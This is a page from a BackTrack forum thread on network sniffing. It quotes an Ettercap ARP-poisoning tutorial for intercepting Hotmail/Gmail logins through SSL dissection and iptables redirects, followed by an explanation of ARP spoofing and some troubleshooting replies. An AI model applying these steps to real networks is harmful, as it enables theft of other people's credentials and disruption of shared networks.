Page 6 of 25 FirstFirst ... 4567816 ... LastLast
Results 51 to 60 of 248

Thread: Sniffing Tutorial:

  1. #51
    Junior Member
    Join Date
    Mar 2007
    Posts
    26

    Default

    Quote Originally Posted by yeehaw View Post
    Simple Sniffing Tutorial

    Tools:

    Ettercap
    nano

    1. For SSL Dissection support (hotmail,gmail), you need to do this:
    Open a shell, type: "nano /usr/local/etc/etter.conf", use the down arrow until you reach "redir_command_on/off", look at the linux part, your gonna need to uncomment:
    Code:
    # if you use iptables:
    #redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
    #redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
    to:

    Code:
    # if you use iptables:
    redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
    redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
    after your done, press F2, Y, Return.

    Now boot Ettercap: Menu --> Backtrack --> Spoofing --> Ettercap
    Go to: Sniff --> Unified Sniffing -->ethX(what interface you want to sniff).
    Then Press: Ctrl+S to scan hosts.
    Then Go to: Mitm --> ARP poisoning, select sniff remote connections, and press ok.
    Then Go to: Start --> Start Sniffing.

    For an Example, Walk to another pc, go to your internet email account (Hotmail, Gmail), and log in, you will be asked to trust the certificate, Trust it, and watch your sniffing computer, the username and password should appear.

    When your done, go to Start --> Stop Sniffing, And go to Mitm --> Stop mitm attack(s)

    Yeehaw

    I'm using BT 2 Final. Where can I find the nano /usr/local/etc/etter.conf" file. Typing it in the command prompt does not work for BT 2 final. I looked for it in the system files but was unable to find it. I got to the etc folder but there is no etter.conf file. I hate asking so many questions and not giving back as many answers.Thanks for the help guys.

  2. #52
    Just burned his ISO
    Join Date
    Feb 2006
    Posts
    15

    Default

    Quote Originally Posted by ghost8786 View Post
    I'm using BT 2 Final. Where can I find the nano /usr/local/etc/etter.conf" file. Typing it in the command prompt does not work for BT 2 final. I looked for it in the system files but was unable to find it. I got to the etc folder but there is no etter.conf file. I hate asking so many questions and not giving back as many answers.Thanks for the help guys.

    works like a charm over here...

  3. #53
    Junior Member
    Join Date
    Mar 2007
    Posts
    26

    Default

    Quote Originally Posted by yeehaw View Post
    works like a charm over here...
    yeah, i finally found it, after searching for quite some time. although my ettercap crashes as soon as i click on the interface to use.

  4. #54
    Just burned his ISO
    Join Date
    Feb 2006
    Posts
    15

    Default

    Quote Originally Posted by ghost8786 View Post
    yeah, i finally found it, after searching for quite some time. although my ettercap crashes as soon as i click on the interface to use.
    that's weird, did you check the md5 of the iso?

  5. #55
    Junior Member
    Join Date
    Mar 2007
    Posts
    26

    Default

    ummm...how would I go about checking the MD5. I know its that string of letters and numbers that was listed below the link to download bt, but that's the extent of my knowledge about it.

  6. #56
    Just burned his ISO
    Join Date
    Feb 2006
    Posts
    15

    Default

    download this: http://www.fourmilab.ch/md5/md5.zip

    put md5.exe in the same directory as bt2final.iso

    then open a console, go to the dir where bt2final.iso is, and type:

    md5 bt2final.iso

    it should be: 990940d975f13d8418b0daa175560ae0

    Yeehaw

  7. #57
    Just burned his ISO zookolo's Avatar
    Join Date
    Apr 2006
    Posts
    4

    Post

    Great tut.... Thanks.

  8. #58
    Just burned his ISO
    Join Date
    Sep 2006
    Posts
    18

    Default

    is it possbile that there is no pop up with the accept certifications at the pc which are checking emails etc ? :>

  9. #59
    coool
    Guest

    Default

    thanks for this topic

    but the password get same md5 I'm search for ettercap hey say people use the filters

    can explain how to use filter with ettercap

    sorry for my language is bad

  10. #60
    Just burned his ISO
    Join Date
    Nov 2006
    Posts
    7

    Default

    Quote Originally Posted by akuma6099 View Post
    I've read all 5 pages of this post and it seems like most of you are new to sniffing and spoofing. It's quite simple yet complex I guess. I too was a noob, even with a weath of knowledge I will always feel like a noob. There's always something you don't know.

    a sniffer sniffs traffic.
    a spoofer spoofs/tricks MAC identities(ARP).

    With a basic hub, you usually can sniff traffic without spoofing. The reasoning is that a hub doesn't know or care about who's connected. All a hub wants to do is move packets around ports. Very basic. Yes this is a very dumbbed down version. So a hub can be sniffed without ARP spoofing/poisoning (mostly).

    A router or switch on the other hand is different. They have internal componets that keep track of the phisically connected devices. Not all switches do this but almost all routers do. A router knows based on the packets header that 192.168.1.100 is located at port 1, Therefore it is added to the CAM table. Every packet that is destined for 192.168.1.100 will be sent to port 1 based on the CAM table A.K.A. Content Addressable Memory. Please look this up as it will unboggle your mind.

    That being said. Now you can see that if you are 192.168.1.102, and you want to see a packet from 192.168.1.101, you cannot just sniff the network. you must in some way influence that packet to your physical port. Can you guess how we do that??? Thats right, about 60,000 posts later and a proggy gets made. We will use Arpspoof or ettercap to deform the ARP cache of your target. In this case 192.168.1.101. ARP works based on IP-MAC combos.

    IP:192.168.1.102 MAC: 00:11:22:33:44:55 US!
    IP:192.168.1.101 MAC: 00:11:22:33:44:66 THEM!
    IP:192.168.1.1 GATEWAY(Out to Internet)

    when 192.168.1.101 wants to send something to 192.168.1.105, It looks in it's arp table. If that IP-MAC combo is in the table then it will send the packet accordingly. If not, it will send an ARP request (who has 192.168.1.105?).

    So the theory of spoofing is that I need to tell 192.168.1.101 that I have address 192.168.1.105. So we beat the ARP packet to the punch. When you ARP spoof, you send TONS of ARP packets sayin I AM 192.168.1.105 with MAC 00:11:22:33:44:55. As you can see, That MAC is OURS. Now 192.168.1.101's ARP table contains that combo. When 192.168.1.101 sends a packet to 192.168.1.105, the packets header will contain OUR MAC. Therefore the router/switch will send it to whoever has that MAC.

    Your probably wondering why I put 192.168.1.1 as a gateway in the list. well, I'll tell ya. If your browsing the internet then your packets must go through the gateway. Now put 2 and 2 together. Spoof THEM as target 1 and GATEWAY as target 2. Now you'll see everything that is destined for the internet/Not your local Network. Thats y theres a target 1 and a target 2. Doesn't matter about direction.

    target 1's packets will have a spoofed MAC in the ARP table as will Target 2. That spoofed MAC will be YOURS and you will be forwarding every packet after you make a copy first. Your box will be turned into a packet forwarder.


    Well it's been fun and I forgot what you posted about about ettercap/arpspoof. I hope this sums it up in a VERY basic and concise way. There is alot more to it, it's up to you to research. Thank you for playing.
    Peace.

    P.S. I love backtrack. Even tho I have 3 posts, I've been using it for over a year. I miss the old site forum. Had more posts in there. So, Thank you to Mutts and all. I will enjoy this distro for the years to come.
    Awesome..!!!!
    That....is an explanation..!

    I have a question thought....
    you are saying "We will use Arpspoof or ettercap to deform the ARP cache of your target."

    Correct me if I am wrong....
    In this way we will damage the arp cache of our targets.
    If we try to arpspoof a big network then all the pc's which are connect to the same switch will have a damaged arp cache. So the network will be unavailable after a while...the targets will have to reboot to fix their arp cache.
    If we have a bigger network with 5 switches and we have connected bt2 on first switch on port1 can we arpspoof all the pcs..?? even if they are connected to the third and fourth switch..?

Page 6 of 25 FirstFirst ... 4567816 ... LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •